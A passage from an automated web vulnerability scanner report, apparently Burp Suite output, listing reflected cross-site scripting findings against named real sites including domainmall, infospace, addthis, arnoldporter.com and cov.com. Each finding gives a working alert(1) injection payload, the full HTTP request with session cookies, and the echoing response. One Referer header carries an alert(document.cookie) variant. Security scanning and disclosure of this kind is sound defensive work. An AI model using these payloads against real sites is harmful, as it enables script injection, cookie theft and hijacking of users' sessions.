Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:47 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=7b4e1c0a481e6b51a8e8953417964887f5cf6ab1; path=/; expires=Wed, 19-Jan-2011 19:15:47 GMT
Content-Length: 33089
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
<title>6c6ee</title><script>alert(1)</script>4caa1df9615.6c6ee</title>
...[SNIP]...

4.60. http://web2.domainmall.com/domainserve/domainView [dn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into the HTML document as plain text between tags. The payload 778ef<script>alert(1)</script>584f04eb84a was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domainserve/domainView?dn=778ef<script>alert(1)</script>584f04eb84a HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:42 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=87c366042c8466e1129e73c4d834367a5e54d93a; path=/; expires=Wed, 19-Jan-2011 19:15:42 GMT
Content-Length: 32673
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
</script>584f04eb84a.778ef<script>alert(1)</script>584f04eb84a/domainserve/domainView?dn=778ef<script>
...[SNIP]...

4.61. http://web2.domainmall.com/domainserve/domainView [dn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eec5"><script>alert(1)</script>da4345821a9 was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domainserve/domainView?dn=9eec5"><script>alert(1)</script>da4345821a9 HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:30 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=bf9ad0a13d12e1c13476be8aa19fd921a11c014d; path=/; expires=Wed, 19-Jan-2011 19:15:30 GMT
Content-Length: 32777
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
<meta name="description" content="Look no further for the best information on 9eec5"><script>alert(1)</script>da4345821a9.9eec5">
...[SNIP]...

4.62. http://web2.domainmall.com/domainserve/domainView [dn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c682d'><script>alert(1)</script>0eba87e9935 was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domainserve/domainView?dn=c682d'><script>alert(1)</script>0eba87e9935 HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:33 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=19e337cb57bdd20b143e8c174e2bbda30121583e; path=/; expires=Wed, 19-Jan-2011 19:15:33 GMT
Content-Length: 32777
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
<INPUT TYPE=HIDDEN NAME='dn' VALUE='c682d'><script>alert(1)</script>0eba87e9935.c682d'>
...[SNIP]...

4.63. http://web2.domainmall.com/domainserve/domainView [dn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58025'%3balert(1)//1b423bdb38b was submitted in the dn parameter. This input was echoed as 58025';alert(1)//1b423bdb38b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domainserve/domainView?dn=58025'%3balert(1)//1b423bdb38b HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:39 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=020ac9983d95161f0d76c3fd16fc5b5fd4847907; path=/; expires=Wed, 19-Jan-2011 19:15:39 GMT
Content-Length: 31997
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascript">
var mobile_redirect_url = 'http://58025';alert(1)//1b423bdb38b.58025';alert(1)//1b423bdb38b/domainserve/domainView?dn=58025';alert(1)//1b423bdb38b.58025';alert(1)//1b423bdb38b&mobile=1';

if(undefined != mobile_redirect_url && navigator.userAgent.match(/(ip
...[SNIP]...

4.64. http://wsdsapi.infospace.com/infomaster/widgets [qkwid1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The value of the qkwid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ce31'%3balert(1)//60c9f7c43e2 was submitted in the qkwid1 parameter. This input was echoed as 9ce31';alert(1)//60c9f7c43e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw9ce31'%3balert(1)//60c9f7c43e2&submitid1=sqkw HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 18:05:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=JKxkv-1aEVJK8TrSC4zgrQyPUpVDdgrvFeBW_v_PrzKceW2yOCkLgBgwdHFbvPr5OpaQtvJ8YPTHfWwl4GWV3GhNrCJKk3Nl0myqcNWKrXVq5G5_rodzQnjJpPDrhKsD-0vXup1i6MsTcSZ86sm0EOic86poPiPwQoyKxoESCLH3ieUQ0; expires=Fri, 14-Dec-2012 04:45:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=33jktje1lyprzd454fe1zryz; path=/
Set-Cookie: DomainSession=TransactionId=1fc361942a8747448838c7deaeb7cb01&SessionId=ffd2a4e5c674424ba5e0c7deaeb7cb01&ActionId=2859ad8491b34b9aa416c7deaeb7cb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Wed, 19-Jan-2011 18:25:10 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=fb3233944f2346679663c7deaeb7cb01&LastSeenDateTime=1/19/2011 6:05:10 PM&IssueDateTime=1/19/2011 6:05:10 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Fri, 26-Dec-2110 18:05:10 GMT; path=/
Cache-Control: public
Expires: Wed, 19 Jan 2011 19:05:10 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


                                   // variable contructors
var txtElements = [{txt:'qkw9ce31';alert(1)//60c9f7c43e2',btn:'sqkw'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw9ce31';alert(1)//60c9f7c43e2');input1.setAttribute('autocomplete','off');

function JSONscr
...[SNIP]...

4.65. http://wsdsapi.infospace.com/infomaster/widgets [submitid1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The value of the submitid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9b6d'%3balert(1)//dd5166876a6 was submitted in the submitid1 parameter. This input was echoed as c9b6d';alert(1)//dd5166876a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkwc9b6d'%3balert(1)//dd5166876a6 HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 18:05:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=jNwawCmwO3s_WpmcrASVP4lAUo6C6z8GBAEXjg_f4A_72l8_zJqRCVQOO1kQh8lTTGZ7_nhSxJV-XZecIGydZ0HQE-T2rDbh3PSAWMeulwhCECSL6Smxm2zkGUgmhrjBO5wpjFWq99w-JHdJ-4hvtE31NWhJLe40EudQkHkfoV-yXj9m0; expires=Fri, 14-Dec-2012 04:45:12 GMT; path=/
Set-Cookie: ASP.NET_SessionId=2rci3t45uzkm0zeix2axfwv5; path=/
Set-Cookie: DomainSession=TransactionId=95cc2984d7be46e88ab5c7deaeb7cb01&SessionId=a968626e22924540b9cec7deaeb7cb01&ActionId=51d4497b031f4c5fa60dc7deaeb7cb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Wed, 19-Jan-2011 18:25:12 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=cd3692fcd30a4459b987c7deaeb7cb01&LastSeenDateTime=1/19/2011 6:05:12 PM&IssueDateTime=1/19/2011 6:05:12 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Fri, 26-Dec-2110 18:05:12 GMT; path=/
Cache-Control: public
Expires: Wed, 19 Jan 2011 19:05:12 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


                                   // variable contructors
var txtElements = [{txt:'qkw',btn:'sqkwc9b6d';alert(1)//dd5166876a6'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw');input1.setAttribute('autocomplete','off');

function JSONscriptRequest(fullUrl, query) {
// RE
...[SNIP]...

4.66. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12d9b<script>alert(1)</script>893317d02a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php12d9b<script>alert(1)</script>893317d02a5 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:26:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ukeipc25sb6n7ajap5tqd3fsa1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php12d9b<script>alert(1)</script>893317d02a5</strong>
...[SNIP]...

4.67. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8866e"-alert(1)-"49ee98219f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php8866e"-alert(1)-"49ee98219f7 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:26:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=tioju43rv1im39822nkpbqlp26; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php8866e"-alert(1)-"49ee98219f7";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.68. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4591f"-alert(1)-"57e0244f404 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/4591f"-alert(1)-"57e0244f404 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:26:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/4591f"-alert(1)-"57e0244f404";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.69. http://www.arnoldporter.com/practices.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e6e"><script>alert(1)</script>277857ca11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices.cfm?u=FinancialServices&action=view&id=476&32e6e"><script>alert(1)</script>277857ca11c=1 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Financial Services</title>
       <meta name="Descriptio
...[SNIP]...
<input type="hidden" name="32e6e"><script>alert(1)</script>277857ca11c" value="1" />
...[SNIP]...

4.70. http://www.arnoldporter.com/practices.cfm [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e37"><script>alert(1)</script>b1acff3e126 was submitted in the u parameter. This input was echoed as e8e37\"><script>alert(1)</script>b1acff3e126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices.cfm?u=FinancialServicese8e37"><script>alert(1)</script>b1acff3e126&action=view&id=476 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Financial Services</title>
       <meta name="Descriptio
...[SNIP]...
<input type="hidden" name="u" value="FinancialServicese8e37\"><script>alert(1)</script>b1acff3e126" />
...[SNIP]...

4.71. http://www.arnoldporter.com/publications.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /publications.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ef8"><script>alert(1)</script>f0da3e29c6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /publications.cfm?action=search&search_publication_type_id=advisory&59ef8"><script>alert(1)</script>f0da3e29c6c=1 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Publications</title>
       <meta name="Description" con
...[SNIP]...
<a href=" /publications.cfm?action=search&search_publication_type_id=advisory&59ef8"><script>alert(1)</script>f0da3e29c6c=1&expand_section=advisory">
...[SNIP]...

4.72. http://www.cov.com/about_the_firm/firm_history [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /about_the_firm/firm_history

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3824'-alert(1)-'1b19dddffc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about_the_firm/firm_history?b3824'-alert(1)-'1b19dddffc8=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:43:35 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1298; path=/
Set-Cookie: PortletId=1293201; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18798


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | About the Firm | Firm History</title>
<meta na
...[SNIP]...
about_the_firm/firm_history/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/about_the_firm/firm_history/AboutSection.aspx?b3824'-alert(1)-'1b19dddffc8=1';//]]>
...[SNIP]...

4.73. http://www.cov.com/balancingworkandfamilylife [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /balancingworkandfamilylife

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec112'-alert(1)-'d654b8e90b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /balancingworkandfamilylife?ec112'-alert(1)-'d654b8e90b6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:46:05 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1155; path=/
Set-Cookie: PortletId=1146501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14806


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Work-Life Balance</title>
<meta na
...[SNIP]...
